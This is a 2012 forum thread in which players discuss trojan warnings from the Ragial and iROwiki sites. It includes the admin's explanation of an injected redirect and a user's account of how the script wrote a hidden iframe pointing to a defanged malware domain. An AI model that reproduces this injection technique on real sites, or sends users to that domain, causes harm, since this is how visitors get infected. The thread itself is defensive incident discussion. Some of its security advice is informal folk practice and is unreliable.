Ragial.com - Trojan alert
#1
Posted 23 May 2012 - 09:15 PM
Threat: JS/Iframe.DK trojan
#2
Posted 23 May 2012 - 09:19 PM
It was attempting to modify the MD5 219a8faed9a602aba91f687fff019019, threat ID 4755606."A known bad file was blocked from opening:
Program:
E4D6Bd01 (Exploit)"
EDIT: Currently I am in the middle of a deep scan, I will let you know if I find anything interesting.
Edited by Superpass, 23 May 2012 - 09:22 PM.
#3
Posted 23 May 2012 - 09:22 PM
#4
Posted 23 May 2012 - 09:24 PM
its odd
#5
Posted 23 May 2012 - 09:30 PM
#6
Posted 23 May 2012 - 09:32 PM
#7
Posted 23 May 2012 - 09:33 PM
EDIT:
My antivirus ended up labeling whatever's in the wiki a Blackhole Exploit Kit. Woo.
Edited by Balthi, 23 May 2012 - 09:33 PM.
#8
Posted 23 May 2012 - 09:45 PM
#9
Posted 23 May 2012 - 09:57 PM
I was on Ragial earlier, but only on Chrome, and I didn't get any popup. I have Adblock enabled.
Anyway please do post the results of the scan. And thanks for the heads up.
#10
Posted 23 May 2012 - 09:58 PM
#11
Posted 24 May 2012 - 12:13 AM
Here is a small guide what I do when my Antivirus detects a Trojaner:
1. Save all needed files which I really dont want to lose and dont have an backup yet such as Pictures and stuff
2. Format C:/ completely => Delete Windows!
3. Install Windows
4. Install Security Stuff
5. Update Windows & Security Stuff
6. Re-implement all the stuff I need and Install games, ect.
7. Deep System Scans of all security programms
8. Scandisk & Defrag of C:
9. Another Deep System Scan
BETWEEN STEP 6 & 9 => Change all my Passwords to NEW(!!!) Passwords which have not been used yet. I think an real life notepad is OKAY to write PW's down, you may want to write them down in another system you can recognize like PASSWORD => DROWSSAP or something just in case someone breaks into your house, steals your Notepad and is a RO Player
Remember: HAVING A NOTEPAD WITH PASSWORDS ON YOUR COMPUTER IS AN ABSOLUTELY NO GO!!!!
(Bad Programs may check for .txt files on your Desktop or much used Files just to check if such a Password.txt file exist!)
----
In my opinon, if you get a trojaner it is always safer to just delete Windows and install it new cause you never know if there might be something hidden...
Edited by Bascojiin, 24 May 2012 - 12:20 AM.
#12
Posted 24 May 2012 - 12:32 AM
In any case, problem has been identified and is in the process of being fixed. It is clever enough to avoid being activated while you're using Chrome (which is why I didn't figure it out at first), Firefox just spit out an encoding error and IE 404'd and passed a webpage off to MSSE which ate it.
(Moral of the story, don't use IE!)
Feel free to run scans but I don't think it'll go much further than your temp folder. Clear your cache etc.
#13
Posted 24 May 2012 - 12:34 AM
So you got hacked I assume?There's really no need for that sort of panic unless you're running on a 10 year old machine that has never had a security update!
In any case, problem has been identified and is in the process of being fixed. It is clever enough to avoid being activated while you're using Chrome (which is why I didn't figure it out at first), Firefox just spit out an encoding error and IE 404'd and passed a webpage off to MSSE which ate it.
(Moral of the story, don't use IE!)
Feel free to run scans but I don't think it'll go much further than your temp folder. Clear your cache etc.
Did any files got compromised such as the User Database off iRO Wiki or iRO Wiki Forums? Just asking cause we all know some really smart people use their Username/ Password on every site
#14
Posted 24 May 2012 - 12:44 AM
Just scan your computer, and if you are feeling a little paranoid change your passwords. And as always, this is a good time to remind you to use different passwords for each site, and don't store them on your computer.
#15
Posted 24 May 2012 - 12:45 AM
#16
Posted 24 May 2012 - 12:47 AM
The trojan seems to only be attached to the iROwiki and ragial. The game itself shouldn't give you any trouble. It wasn't the game that had any issues.I play it with computer server,but its look like nothing happen with the firewall and anti virus and anti hack alert <.< so ,not every1 gone got atcking from that trojan??
#17
Posted 24 May 2012 - 01:07 AM
Modern security software, working as intended, blocked anything from really happening on your side. Firefox simply failed with an encoding error, IE tried to redirect to the bad website and was halted by a combination of protections.
Whoever made the malware was smart enough to bypass chrome completely so google couldn't pick up on it! (meaning, if you use chrome, the bad code never ran)
No user data on the irowiki side was compromised. The only compromise, as I said before would be if you were running an ancient version of windows xp with no security software.
http://www.microsoft...Name=JS/Blacole
Long story short, if Windows, Java, and Adobe Reader are up to date, nothing will happen
Edited by Bluedreams, 24 May 2012 - 01:16 AM.
#18
Posted 24 May 2012 - 01:09 AM
#19
Posted 24 May 2012 - 01:25 AM
i have a notepad...on the laptop i dont connect internet =)Time for another Forced Password Change I assume if you get an Trojaner via iRO wiki the Trojaner will look for your RO Passwords
Here is a small guide what I do when my Antivirus detects a Trojaner:
1. Save all needed files which I really dont want to lose and dont have an backup yet such as Pictures and stuff
2. Format C:/ completely => Delete Windows!
3. Install Windows
4. Install Security Stuff
5. Update Windows & Security Stuff
6. Re-implement all the stuff I need and Install games, ect.
7. Deep System Scans of all security programms
8. Scandisk & Defrag of C:
9. Another Deep System Scan
BETWEEN STEP 6 & 9 => Change all my Passwords to NEW(!!!) Passwords which have not been used yet. I think an real life notepad is OKAY to write PW's down, you may want to write them down in another system you can recognize like PASSWORD => DROWSSAP or something just in case someone breaks into your house, steals your Notepad and is a RO Player
Remember: HAVING A NOTEPAD WITH PASSWORDS ON YOUR COMPUTER IS AN ABSOLUTELY NO GO!!!!
(Bad Programs may check for .txt files on your Desktop or much used Files just to check if such a Password.txt file exist!)
----
In my opinon, if you get a trojaner it is always safer to just delete Windows and install it new cause you never know if there might be something hidden...
#20
Posted 24 May 2012 - 01:33 AM
#21
Posted 24 May 2012 - 01:56 AM
#22
Posted 24 May 2012 - 02:22 AM
#23
Posted 24 May 2012 - 02:41 AM
Good night!
#24
Posted 24 May 2012 - 04:09 AM
This is not a new trick, but it is nifty. If you look at the source, the javascript at the top of the ragial uses document.write to create an 10x10 invisible iframe. It then inserts the created div into the body. The actual src leads to http drjdrdjgyiuu myfw us. (malware infested, so .'s replaced with smiley)Some glitch in an old version of phpmyadmin that was running on a website I host (think 5+ years old) allowed code to be injected which tried to redirect the initial website request to another website to download malware.
Modern security software, working as intended, blocked anything from really happening on your side. Firefox simply failed with an encoding error, IE tried to redirect to the bad website and was halted by a combination of protections.
Whoever made the malware was smart enough to bypass chrome completely so google couldn't pick up on it! (meaning, if you use chrome, the bad code never ran)
No user data on the irowiki side was compromised. The only compromise, as I said before would be if you were running an ancient version of windows xp with no security software.
http://www.microsoft...Name=JS/Blacole
Long story short, if Windows, Java, and Adobe Reader are up to date, nothing will happen
As to why it "bypassed" chrome, it didn't. It's the other way round. Just take a look at the actual script and where it is placed, and you'll see why it didn't load on webkit based browsers.
If you think about this sort of attacks, it really isn't effective. Modern antivrus software that scans http streams will recognize the js code, and catch it even before the page loads, and therefore even before it has a chance to insert the iframe, (the js code calls out <body> by id, so it can only run after everything before </body> has been loaded). This probably resulted in firefox giving out 404's.
Interestingly, with the newest firefox nightly, sandboxed iframes are introduced, which should annihilate this sort of malicious attacks, if web devs choose to implement it.
#25
Posted 24 May 2012 - 04:16 AM
1 user(s) are reading this topic
0 members, 1 guests, 0 anonymous users